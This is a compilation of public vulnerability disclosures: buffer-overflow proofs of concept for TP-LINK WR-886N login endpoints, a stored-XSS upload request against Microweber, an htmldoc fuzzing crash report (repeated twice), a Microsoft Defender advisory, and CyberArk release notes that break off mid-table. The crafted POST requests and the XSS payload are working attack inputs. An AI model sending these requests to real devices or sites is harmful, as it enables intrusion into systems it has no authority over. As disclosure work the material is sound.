A Buffer Overflow vulnerabiltiy exists in TP-LINK WR-886N 20190826 2.3.8 in thee /cloud_config/router_post/login feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/login interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/login interface.

1.  An interface `/cloud_config/router_post/login` is registered first in the loginRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/loginRegister/loginRegister1.png)
2.  In the handler, the v7 variable is the `username` field in the packet, and the v9 variable is the `password` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/loginRegister/loginRegister2.png)

**poc**

    POST /cloud_config/router_post/login HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&password=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44628: IoT_CVE/886N/loginRegister at main · Yu3H0/IoT_CVE

A Buffer Overflow vulnerability exists in TP-LINK WR-886N 20190826 2.3.8 in the /cloud_config/router_post/get_reset_pwd_veirfy_code feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/get\_reset\_pwd\_veirfy\_code interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/get\_reset\_pwd\_veirfy\_code interface.

1.  An interface `/cloud_config/router_post/get_reset_pwd_veirfy_code` is registered first in the getResetVeriRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/getResetVeriRegister/getResetVeriRegister1.png)
2.  In the handler, the v7 variable is the `username` field in the packet, and the v9 variable is the `account_type` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/getResetVeriRegister/getResetVeriRegister2.png)

**poc**

    POST /cloud_config/router_post/get_reset_pwd_veirfy_code HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&account_type=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44627: IoT_CVE/886N/getResetVeriRegister at main · Yu3H0/IoT_CVE

Unrestricted file upload leads to stored XSS in GitHub repository microweber/microweber prior to 1.1.12.

**Description**

A user can bypass checking and upload `.aspx` file which lead to stored XSS.

**Proof of Concept**

*   Log in as admin: https://demo.microweber.org/demo/admin/
*   Go to Websites > Edit a page.
*   Under **Pictures**, choose **Add files**
*   Instead of uploading a normal picture, use the below request to upload an `aspx` file.

\-- The request to upload:

    POST /demo/plupload HTTP/1.1
    Host: demo.microweber.org
    Cookie: csrf-token-data=%7B%22value%22%3A%22LbUJYT94IdMzaqSj3tCwbEgp402H94lb3LBdoQK8%22%2C%22expiry%22%3A1646836721840%7D; laravel_session=ZNv8dU4zHigWLlPFd8LQoeMyJtWGy8GK5Su1IA2F; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/
    Content-Length: 533
    Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7ACkSBriVfqdfw4D
    X-Requested-With: XMLHttpRequest
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
    Sec-Ch-Ua-Platform: "macOS"
    Origin: https://demo.microweber.org
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.microweber.org/demo/admin/page/24/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    ------WebKitFormBoundary7ACkSBriVfqdfw4D
    Content-Disposition: form-data; name="name"
    
    xss.aspx
    ------WebKitFormBoundary7ACkSBriVfqdfw4D
    Content-Disposition: form-data; name="chunk"
    
    0
    ------WebKitFormBoundary7ACkSBriVfqdfw4D
    Content-Disposition: form-data; name="chunks"
    
    1
    ------WebKitFormBoundary7ACkSBriVfqdfw4D
    Content-Disposition: form-data; name="file"; filename="blob"
    Content-Type: text/html
    
    <html>
    <script>alert(document.domain)</script>
    </html>
    IEND®B`
    ------WebKitFormBoundary7ACkSBriVfqdfw4D--
    
    

The response:

    HTTP/1.1 200 OK
    Date: Wed, 09 Mar 2022 14:26:01 GMT
    Server: Apache
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Last-Modified: Wed, 09 Mar 2022 14:26:01 GMT
    Connection: close
    Content-Type: application/json
    Content-Length: 123
    
    {"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss.aspx","name":"xss.aspx","bytes_uploaded":"533"}
    

![request-response](https://bu.gbounty.cc/5b2b391d35fd687ff6bebe0bd3ac2b40/request-response.png)

*   Visit `https://demo.microweber.org/demo/userfiles/media/default/xss.aspx` to confirm the XSS.

![XSS](https://bu.gbounty.cc/5b2b391d35fd687ff6bebe0bd3ac2b40/XSS.png)

**Impact**

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user, in this case, an admin.

CVE-2022-0906: Unrestricted file upload leads to stored XSS in microweber

Microsoft released a security update to address CVE-2022-23278 in Microsoft Defender for Endpoint. This important class spoofing vulnerability impacts all platforms. We wish to thank Falcon Force for the collaboration on addressing this issue through coordinated vulnerability disclosure.
Cybercriminals are looking for any opening to tamper with security protections in order to blind, confuse, or often shut off customer defenses.

Microsoft released a security update to address CVE-2022-23278 in Microsoft Defender for Endpoint. This important class spoofing vulnerability impacts all platforms. We wish to thank Falcon Force for the collaboration on addressing this issue through coordinated vulnerability disclosure.

Cybercriminals are looking for any opening to tamper with security protections in order to blind, confuse, or often shut off customer defenses. Microsoft continuously works to defeat these methods to help our customers protect their environment and gain visibility when attacks occur, both through our own research and in partnership with the security community. With our March security update release, we are further hardening Microsoft Defender for Endpoint by addressing the ability for attackers to spoof information between the client and the service. This vulnerability impacts all platforms and the updates we have released should be deployed just like any other security update. On Windows, this is part of the March Cumulative Update for Windows so if automatic updates are scheduled, no further action is necessary. For those who do not have automatic updates turned on, we recommend doing so. Customers using the latest operating systems benefit from new operating system capabilities that allow strong protections. Instructions for the normal deployment method are below:

Release Channel

Available

Next Step

Windows Update and Microsoft Update

Yes

None. This update will be downloaded and installed automatically from Windows Update.

Windows Update for Business

Yes

None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.

Microsoft Update Catalog

Yes

To get the standalone package for this update, go to the Microsoft Update Catalog website.

Windows Server Update Services (WSUS)

Yes

This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product:** Windows 11, Windows 10, Windows Server 2016, Windows Server 2019, or Windows Server 2022. **Classification** : Security Updates Products past end of life will not receive the update

Microsoft AutoUpdate for macOS

Yes

Information on automatic or manual configuration can be found here.

Updates for Linux

Yes

Information on manual installation can be found here.

Google Play Store

Yes

Information on deploying and configuring updates on Android can be found here.

Apple App Store

Yes

Information on deploying and configuring updates on iOS can be found here.

At time of publication, Microsoft is not aware of any attacks that have leveraged this vulnerability. In addition to the security update, Microsoft has released detections for possible exploit activity. Customers should monitor for those detections (list below) and consult the threat analytics article (requires license and access) which surfaces risk and possible exploit activity.

*   Suspicious client communication – detects suspicious client communication which could either be caused by device spoofing or duplicate device IDs.

Customers are encouraged to apply the March security updates as soon as possible. Official documentation on the updates can be found here: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23278.

\- Microsoft Defender for Endpoint Team

Guidance for CVE-2022-23278 spoofing in Microsoft Defender for Endpoint

Null pointer dereference in the htmldoc v1.9.11 and before may allow attackers to execute arbitrary code and cause a denial of service via a crafted html file.

While fuzzing htmldoc I found a segmentation fault in the copy\_image() function, in epub.cxx:1221

testcase:(zipped so GitHub accepts it)  
crash01.html.zip

reproduced by running:

    htmldoc -f demo.epub  crash01.html 
    

htmldoc Version v1.9.11 git \[master 0f9d20\]  
tested on:

OS :Ubuntu 20.04.1 LTS  
kernel: 5.4.0-53-generic  
compiler: clang version 10.0.0-4ubuntu1  
Target: x86\_64-pc-linux-gnu

OS : macOS Catalina 10.15.5(19F101) MacBook Pro (Retina, 13-inch, Early 2015)  
compiler: Apple clang version 11.0.0 (clang-1100.0.33.17)

Install from snap or download mac dmg don't crash for this testcase.

*   addresssanitizer

    ==3252595==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000042fc30 bp 0x7ffe6ab48d00 sp 0x7ffe6ab484a0 T0)
    ==3252595==The signal is caused by a READ memory access.
    ==3252595==Hint: address points to the zero page.
        #0 0x42fc30 in strcmp (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x42fc30)
        #1 0x7f70ce1fd7c7 in bsearch /build/glibc-ZN95T4/glibc-2.31/stdlib/../bits/stdlib-bsearch.h:33:23
        #2 0x4c81b0 in copy_image(_zipc_s*, char const*) /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:1221:25
        #3 0x4c8434 in copy_images(_zipc_s*, tree_str*) /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:1288:11
        #4 0x4c71c5 in epub_export /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:211:13
        #5 0x4d0f13 in main /home/chiba/check_crash/htmldoc/htmldoc/htmldoc.cxx:1291:3
        #6 0x7f70ce1dd0b2 in __libc_start_main /build/glibc-ZN95T4/glibc-2.31/csu/../csu/libc-start.c:308:16
        #7 0x41c5fd in _start (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x41c5fd)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x42fc30) in strcmp
    ==3252595==ABORTING
    

*   gdb

    ─[ DISASM ]─
     ► 0x7ffff7de1ed7 <__strcmp_avx2+887>    vmovdqu ymm1, ymmword ptr [rdi + rdx]
       0x7ffff7de1edc <__strcmp_avx2+892>    vpcmpeqb ymm0, ymm1, ymmword ptr [rsi + rdx]
       0x7ffff7de1ee1 <__strcmp_avx2+897>    vpminub ymm0, ymm0, ymm1
       0x7ffff7de1ee5 <__strcmp_avx2+901>    vpcmpeqb ymm0, ymm0, ymm7
       0x7ffff7de1ee9 <__strcmp_avx2+905>    vpmovmskb ecx, ymm0
       0x7ffff7de1eed <__strcmp_avx2+909>    test   ecx, ecx
       0x7ffff7de1eef <__strcmp_avx2+911>    jne    __strcmp_avx2+848 <__strcmp_avx2+848>
        ↓
       0x7ffff7de1eb0 <__strcmp_avx2+848>    add    rdi, rdx
       0x7ffff7de1eb3 <__strcmp_avx2+851>    add    rsi, rdx
       0x7ffff7de1eb6 <__strcmp_avx2+854>    tzcnt  edx, ecx
       0x7ffff7de1eba <__strcmp_avx2+858>    movzx  eax, byte ptr [rdi + rdx]
    ─[ STACK ]──
    00:0000│ rsp  0x7fffffffd948 —▸ 0x7ffff7ca27c8 (bsearch+88) ◂— test   eax, eax
    01:0008│      0x7fffffffd950 —▸ 0x555555aa6bc0 —▸ 0x555555aa6fd0 —▸ 0x7ffff7e47000 (main_arena+1152) —▸ 0x7ffff7e46ff0 (main_arena+1136) ◂— ...
    02:0010│      0x7fffffffd958 ◂— 0x8
    03:0018│      0x7fffffffd960 ◂— 0x0
    04:0020│      0x7fffffffd968 —▸ 0x555555aa8bf0 —▸ 0x555555aa8af0 —▸ 0x555555aa7f40 —▸ 0x555555aa65c0 ◂— ...
    05:0028│      0x7fffffffd970 —▸ 0x555555aa9200 —▸ 0x555555aa6340 ◂— 0x5555fbad2480
    06:0030│      0x7fffffffd978 —▸ 0x555555aa8fe0 ◂— 0x616d693a61746164 ('data:ima')
    07:0038│      0x7fffffffd980 —▸ 0x5555555cd04b ◂— 0x22263e3c00435253 /* 'SRC' */
    
    pwndbg> bt
    #0  __strcmp_avx2 () at ../sysdeps/x86_64/multiarch/strcmp-avx2.S:736
    #1  0x00007ffff7ca27c8 in __GI_bsearch (__key=0x7fffffffd9a0, __base=0x555555aa6bc0, __nmemb=<optimized out>, __size=8, __compar=0x55555555d609 <compare_images(char**, char**)>) at ../bits/stdlib-bsearch.h:33
    #2  0x000055555555d6ed in copy_image (zipc=zipc@entry=0x555555aa9200, filename=filename@entry=0x555555aa8fe0 "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAA,BlBMVEUAAAD///+l2Z/dAAAAM0lEQVR4nGP4/5/h/1+G/58ZDrAz3D/McH8yw83NDDeNGe4Ug9CLzwz3gVLMDA/A6P9/#FGGF\207jOXZtQAAAAAElFTkSuQmCC") at epub.cxx:1235
    #3  0x000055555555d81c in copy_images (zipc=zipc@entry=0x555555aa9200, t=0x555555aa8bf0, t@entry=0x555555aa65c0) at epub.cxx:1288
    #4  0x000055555555e813 in epub_export (document=0x555555aa65c0, toc=0x555555aa6760) at epub.cxx:211
    #5  0x000055555555d448 in main (argc=<optimized out>, argc@entry=4, argv=argv@entry=0x7fffffffe4e8) at htmldoc.cxx:1291
    #6  0x00007ffff7c820b3 in __libc_start_main (main=0x55555555af20 <main(int, char**)>, argc=4, argv=0x7fffffffe4e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe4d8) at ../csu/libc-start.c:308
    #7  0x000055555555d54e in _start () at htmldoc.cxx:1315
    
    

The bug locate in epub.cxx:1221 compare\_images. The arguments of compare\_images didn't checked so strcmp() lead a segfault due to to null pointer.

Reporter: chiba of topsec alphalab

CVE-2021-26948: SEGV on unknown address 0x000000000000   · Issue #410 · michaelrsweet/htmldoc

While fuzzing htmldoc I found a segmentation fault in the copy\_image() function, in epub.cxx:1221

testcase:(zipped so GitHub accepts it)  
crash01.html.zip

reproduced by running:

    htmldoc -f demo.epub  crash01.html 
    

htmldoc Version v1.9.11 git \[master 0f9d20\]  
tested on:

OS :Ubuntu 20.04.1 LTS  
kernel: 5.4.0-53-generic  
compiler: clang version 10.0.0-4ubuntu1  
Target: x86\_64-pc-linux-gnu

OS : macOS Catalina 10.15.5(19F101) MacBook Pro (Retina, 13-inch, Early 2015)  
compiler: Apple clang version 11.0.0 (clang-1100.0.33.17)

Install from snap or download mac dmg don't crash for this testcase.

*   addresssanitizer

    ==3252595==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000042fc30 bp 0x7ffe6ab48d00 sp 0x7ffe6ab484a0 T0)
    ==3252595==The signal is caused by a READ memory access.
    ==3252595==Hint: address points to the zero page.
        #0 0x42fc30 in strcmp (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x42fc30)
        #1 0x7f70ce1fd7c7 in bsearch /build/glibc-ZN95T4/glibc-2.31/stdlib/../bits/stdlib-bsearch.h:33:23
        #2 0x4c81b0 in copy_image(_zipc_s*, char const*) /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:1221:25
        #3 0x4c8434 in copy_images(_zipc_s*, tree_str*) /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:1288:11
        #4 0x4c71c5 in epub_export /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:211:13
        #5 0x4d0f13 in main /home/chiba/check_crash/htmldoc/htmldoc/htmldoc.cxx:1291:3
        #6 0x7f70ce1dd0b2 in __libc_start_main /build/glibc-ZN95T4/glibc-2.31/csu/../csu/libc-start.c:308:16
        #7 0x41c5fd in _start (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x41c5fd)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x42fc30) in strcmp
    ==3252595==ABORTING
    

*   gdb

    ─[ DISASM ]─
     ► 0x7ffff7de1ed7 <__strcmp_avx2+887>    vmovdqu ymm1, ymmword ptr [rdi + rdx]
       0x7ffff7de1edc <__strcmp_avx2+892>    vpcmpeqb ymm0, ymm1, ymmword ptr [rsi + rdx]
       0x7ffff7de1ee1 <__strcmp_avx2+897>    vpminub ymm0, ymm0, ymm1
       0x7ffff7de1ee5 <__strcmp_avx2+901>    vpcmpeqb ymm0, ymm0, ymm7
       0x7ffff7de1ee9 <__strcmp_avx2+905>    vpmovmskb ecx, ymm0
       0x7ffff7de1eed <__strcmp_avx2+909>    test   ecx, ecx
       0x7ffff7de1eef <__strcmp_avx2+911>    jne    __strcmp_avx2+848 <__strcmp_avx2+848>
        ↓
       0x7ffff7de1eb0 <__strcmp_avx2+848>    add    rdi, rdx
       0x7ffff7de1eb3 <__strcmp_avx2+851>    add    rsi, rdx
       0x7ffff7de1eb6 <__strcmp_avx2+854>    tzcnt  edx, ecx
       0x7ffff7de1eba <__strcmp_avx2+858>    movzx  eax, byte ptr [rdi + rdx]
    ─[ STACK ]──
    00:0000│ rsp  0x7fffffffd948 —▸ 0x7ffff7ca27c8 (bsearch+88) ◂— test   eax, eax
    01:0008│      0x7fffffffd950 —▸ 0x555555aa6bc0 —▸ 0x555555aa6fd0 —▸ 0x7ffff7e47000 (main_arena+1152) —▸ 0x7ffff7e46ff0 (main_arena+1136) ◂— ...
    02:0010│      0x7fffffffd958 ◂— 0x8
    03:0018│      0x7fffffffd960 ◂— 0x0
    04:0020│      0x7fffffffd968 —▸ 0x555555aa8bf0 —▸ 0x555555aa8af0 —▸ 0x555555aa7f40 —▸ 0x555555aa65c0 ◂— ...
    05:0028│      0x7fffffffd970 —▸ 0x555555aa9200 —▸ 0x555555aa6340 ◂— 0x5555fbad2480
    06:0030│      0x7fffffffd978 —▸ 0x555555aa8fe0 ◂— 0x616d693a61746164 ('data:ima')
    07:0038│      0x7fffffffd980 —▸ 0x5555555cd04b ◂— 0x22263e3c00435253 /* 'SRC' */
    
    pwndbg> bt
    #0  __strcmp_avx2 () at ../sysdeps/x86_64/multiarch/strcmp-avx2.S:736
    #1  0x00007ffff7ca27c8 in __GI_bsearch (__key=0x7fffffffd9a0, __base=0x555555aa6bc0, __nmemb=<optimized out>, __size=8, __compar=0x55555555d609 <compare_images(char**, char**)>) at ../bits/stdlib-bsearch.h:33
    #2  0x000055555555d6ed in copy_image (zipc=zipc@entry=0x555555aa9200, filename=filename@entry=0x555555aa8fe0 "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAA,BlBMVEUAAAD///+l2Z/dAAAAM0lEQVR4nGP4/5/h/1+G/58ZDrAz3D/McH8yw83NDDeNGe4Ug9CLzwz3gVLMDA/A6P9/#FGGF\207jOXZtQAAAAAElFTkSuQmCC") at epub.cxx:1235
    #3  0x000055555555d81c in copy_images (zipc=zipc@entry=0x555555aa9200, t=0x555555aa8bf0, t@entry=0x555555aa65c0) at epub.cxx:1288
    #4  0x000055555555e813 in epub_export (document=0x555555aa65c0, toc=0x555555aa6760) at epub.cxx:211
    #5  0x000055555555d448 in main (argc=<optimized out>, argc@entry=4, argv=argv@entry=0x7fffffffe4e8) at htmldoc.cxx:1291
    #6  0x00007ffff7c820b3 in __libc_start_main (main=0x55555555af20 <main(int, char**)>, argc=4, argv=0x7fffffffe4e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe4d8) at ../csu/libc-start.c:308
    #7  0x000055555555d54e in _start () at htmldoc.cxx:1315
    
    

The bug locate in epub.cxx:1221 compare\_images. The arguments of compare\_images didn't checked so strcmp() lead a segfault due to to null pointer.

CyberArk Identity versions up to and including 22.1 in the 'StartAuthentication' resource, exposes the response header 'X-CFY-TX-TM'. In certain configurations, that response header contains different, predictable value ranges which can be used to determine whether a user exists in the tenant.

Release 22.2 (available February 25, 2022) introduces the following changes.

Refer to CyberArk Identity Release Notes - Previous Versions for changes in previous releases.

**New features**

The following new features are available starting in 22.2.

 

Feature

Description

**Workforce Password Management**

Inline Password Generator for change password flow

The CyberArk Identity Browser Extension is enhanced to automatically detect if the user is on a websites’ change password screen, autofill in the existing password field and with a click of the icon (displayed in the image below) generate a strong password inline to fill in the New Password and Confirm Password fields. Upon save, the browser extension captures and offers to save the updated password in cloud or self-hosted vault. This feature allows for seamless user experience of changing their business account passwords and avoid any potential password related security vulnerabilities.

![](https://docs.cyberark.com/Product-Doc/OnlineHelp/Idaptive/Latest/en/Content/ReleaseNotes/images/GeneratePassword_RNimage_364x349.png)

Refer to Update passwords with the Password Generator for more information.

**Improvements and behavior changes**

This release includes the following product improvement.

 

Improvement

Description

**CyberArk Identity mobile apps**

Android CyberArk Identity mobile app support changes

The policy setting to Encrypt internal onboard storage (Endpoint policies > Common settings > mobile settings > common > Encrypt internal onboard storage) is removed. CyberArk removed this policy setting because encrypting internal storage is the default behavior starting with Android 5. You cannot enroll Android 4.4.4 and older devices as the policy setting is removed.

**Early access features**

Early access features are fully-supported features made available on a case-by-case basis by request. Early access features might see more frequent updates compared to GA features.

Contact your account representative to enable early access features.

The following table describes features that are currently in an early access state.

  

Feature

Description

Initial release version

**Authentication**

New Authentication Widget Builder

This feature enables you to create a widget and visualize the preview of the widget before using it.

22.1

Progressive migration of passwords using code plugin

This feature enables you to progressively migrate hashed passwords from their legacy stores to CyberArk Identity by providing an inline legacy authentication hook into the CyberArk Identity authentication process.

21.12

**User interface**

Updated design in Application tile

The design is updated for the app tiles. A new Shared icon has been introduced in the app tile. You can view this icon on the bottom right of the app tile. You can view all other icons on the bottom right of the tile except the New and Error icon.

![](https://docs.cyberark.com/Product-Doc/OnlineHelp/Idaptive/Latest/en/Content/ReleaseNotes/images/New_apptile_UI_446x390.png)

22.2

Enhanced interface in Applications

This enhancement allows you to customize tabs in Applications based on your requirements. You can perform the following actions in the User Portal:

*   Add tabs
    
*   Delete tabs
    
*   Re-order tabs
    
*   Drag and drop apps from one tab to another tab
    

A new drop-down has been introduced, which allows you to sort all applications.

![](https://docs.cyberark.com/Product-Doc/OnlineHelp/Idaptive/Latest/en/Content/ReleaseNotes/images/Allappstabs_RNimage_618x314.png)

22.2

**Android mobile application**

Support for push notifications on the Android mobile app for users in China

This feature enables users who don't have access to Google services, like users in China, to explicitly fetch the push notifications and policy updates sent by CyberArk Identity.

Contact your CyberArk account representative to enable this feature if you have users without access to Google services.

Refer to Download the CyberArk Identity mobile app for Android and CyberArk Identity-SDK for-Android for more information.

21.11

**Endpoints**

Windows and Mac Device Trust

The CyberArk IdentityWindows Device Trust and Mac Device Trust prevent untrusted computers from accessing the CyberArk Identity portals or web applications using authentication certificates as a conditional access mechanism. This provides additional device trust to identity and access policies.

The Windows Device Trust is available for AD-joined devices and users must first be validated using IWA authentication. The Windows Device Trust is available in the Admin Portal > Downloads.

The CyberArk IdentityMac Device Trust is available for AD-joined devices and non AD-joined devices, and is deployed with Jamf Pro.

Additional enhancements include:

*   New functionality (Revoke, Issue, Renew, and Lifetime ) has been added for certificate management for Windows Cloud Agent and Windows Device Trust. This is available in the Admin Portal > Settings > Endpoints, select an endpoint then go to the Certificates tab.
    
*   Integrations in the Admin Portal > Settings > Endpoints has been renamed to Device Trust.
    

Refer to CyberArk Identity Mac Device Trust and CyberArk Identity Windows Device Trust for more information.

Mac - 21.9

Windows - 21.5

**New Single Sign-On templates**

New Single Sign-On (SSO) application templates are added to the CyberArk Identity Web App Catalog on a regular basis, independent of the product release schedule.

Refer to Recent SSO application templates for a list of recently added templates.

**Component versions**

Refer to the following table for a list of component versions in the latest release:

 

Component

Version

CyberArk Identity

22.2.196

Windows Cloud Agent

22.1.289

Windows Device Trust

22.2.196

Mac Cloud Agent

22.2.196

Mac Device Trust

22.2.196

Android CyberArk Identity mobile app

22.2.106

iOS CyberArk Identity mobile app

22.2.105

Windows CyberArk Authenticator

22.2.196

Mac CyberArk Authenticator

22.2.196

Browser Extensions

22.2.3

Connector

22.2.196

**Browser support**

This version of CyberArk Identity has been tested with the following browsers:

 

Browser

Version

Internet Explorer

Version 11 on Windows 2008 server, Windows 2012 server, Windows 7, and Windows 8

Microsoft Edge

latest version available at release

Mozilla Firefox

latest version available at release

Google Chrome

latest version available at release

Apple Safari

11

For silent authentication to work correctly, some web browsers need additional configuration (see Configure browsers for silent authentication) or a browser extension (see Manage credentials with Workforce Password Management).

On devices, the CyberArk Identity mobile app opens the web applications in the native browser unless that application requires a browser extension to provide single sign-on. For these applications only, the CyberArk Identity mobile app opens the application in its built-in browser.

**CyberArk Identity Browser Extension support**

The Browser Extension for Internet Explorer and Safari is deprecated. If your users use those browsers with a previous version of the Browser Extension and you want them to continue to do so, you should restrict updates to the Browser Extension.

Users restricted to old versions of the Browser Extension will not benefit from updates and new features. Refer to Restrict CyberArk Identity Browser Extension updates for more information.

Computers must meet the following requirements to install the Browser Extension.

*   Microsoft .NET Framework 4.6.2 or later
*   Microsoft Installer 3.1 or later

In addition, browser support for the Browser Extension features is indicated in the following table.

   

Chrome  
(latest available at release)

Firefox  
(latest available at release)

Edge

Form filling

Yes

Yes

Yes

App capture

Not supported

Yes

Not supported

Land and Catch

Yes

Yes

Yes

App Launch

Yes

Yes

Yes

**Device support**

If you are using CyberArk Identity for mobile device management and authentication, it supports enrolling the following devices and computers using the cloud agents.

The purpose of the cloud agent is to enforce authentication profiles; it’s only active during authentication. Unlike Anti-Virus and Endpoint Detection and Response agents, the CyberArk cloud agents are not listening to system events or otherwise consuming endpoint resources after the user logs in.

 

Operating System

Versions supported

Windows

10, Server 2016, Server 2019

Desktop Experience is required for Windows servers.

macOS

10.13, 10.14, 10.15, 11, 12

iOS

11.x and later

iPadOS

13.x and later

watchOS

5.x and later

Android

8.x and later

**Language support**

Foreign language support is provided for the following components:

*   CyberArk Identity User Portal help -- Japanese only
*   User Portal text strings.
*   Admin Portal text strings

Not all of the languages listed below are available for the Admin Portal text strings.

Administrators can select the language in which the user portal texts and CyberArk Identity system messages are displayed. The default setting, (--), is equivalent to not setting a language. In this case, the user's browser language selection will be used. However, if users configure their own language selection, then that language takes precedence. For example, if you set the language to French in the Admin Portal and a user sets the language to Vietnamese in the User Portal, then Vietnamese is used for that user. Users can specify their language selection in User Portal > Account \> Personal Profile > Language drop-down list.

To configure the language option in the Admin Portal

1.  Log-in to the Admin Portal.
2.  Click Access \> Policies \> Select the relevant policy.
3.  Click User Security Policies > User Account Settings.
4.  Select the default language in the Default Language drop-down list.
5.  Click Save.

In this release, translations are provided for the following languages:

*   Arabic
*   Brazilian Portuguese
*   Chinese—Simplified and Traditional
*   Dutch
*   French
*   German
*   Italian
*   Japanese
*   Korean
*   Portuguese
*   Russian
*   Serbian
*   Spanish
*   Swedish
*   Thai
*   Vietnamese

Additional languages are being added over time—see the Release Notes for the most recent additions.

**Known issues**

 

Issue

Workaround

**General platform**

